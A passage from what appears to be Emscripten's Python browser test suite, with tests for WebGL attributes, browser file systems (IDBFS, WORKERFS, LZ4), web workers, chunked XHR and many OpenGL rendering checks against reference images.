self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js'])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
def test_fflush(self):
return self.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
self.btest('test_fflush.cpp', '0', args=['-s', 'NO_EXIT_RUNTIME=1', '--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'];
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'];
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10;
secret2 = 'b' * 10;
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'): os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
import random
self.clear()
os.mkdir('subdir')
open('file1.txt', 'wb').write('0123456789' * (1024*128))
open(os.path.join('subdir', 'file2.txt'), 'wb').write('1234567890' * (1024*128))
random_data = [chr(random.randint(0,255)) for x in range(1024*128*10 + 1)]
random_data[17] = 'X'
open('file3.txt', 'wb').write(''.join(random_data))
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print 'emcc-normal'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3*1024*128*10 + 1
assert os.stat('test.data').st_size < (3*1024*128*10)/2 # over half is gone
print ' emcc-opts'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print 'normal'
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1'], timeout=60)
print ' opts'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print 'manual'
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1'], timeout=60)
print ' opts'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-O2'], timeout=60)
print ' opts+closure'
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=75000000'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html')])
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1'],
message='You should see a blue triangle.')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=[])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2'])
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_worker(self):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
# no file data
for file_data in [0, 1]:
print 'file data', file_data
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) , stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
if not file_data: self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""")
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_long(self):
for proxy in [0, 1]:
print 'proxy', proxy
self.btest('hello_world_gles.c', expected=map(str, range(30, 500)), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print full_es2
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print program
basename = os.path.basename(program)
args = []
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args, timeout=30)
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print source
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first');
open('file2.txt', 'w').write('second');
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1')
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
self.btest('emscripten_main_loop.cpp', '0')
def test_emscripten_main_loop_settimeout(self):
self.btest('emscripten_main_loop_settimeout.cpp', '1')
def test_emscripten_main_loop_and_blocker(self):
self.btest('emscripten_main_loop_and_blocker.cpp', '0')
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1')
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1')
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1')
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1')
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1')
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0')
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'])
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'], also_proxied=True)
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'RELOCATABLE=1'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
for opts in [0, 1]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=['-O' + str(opts), 'side.c', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True)
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
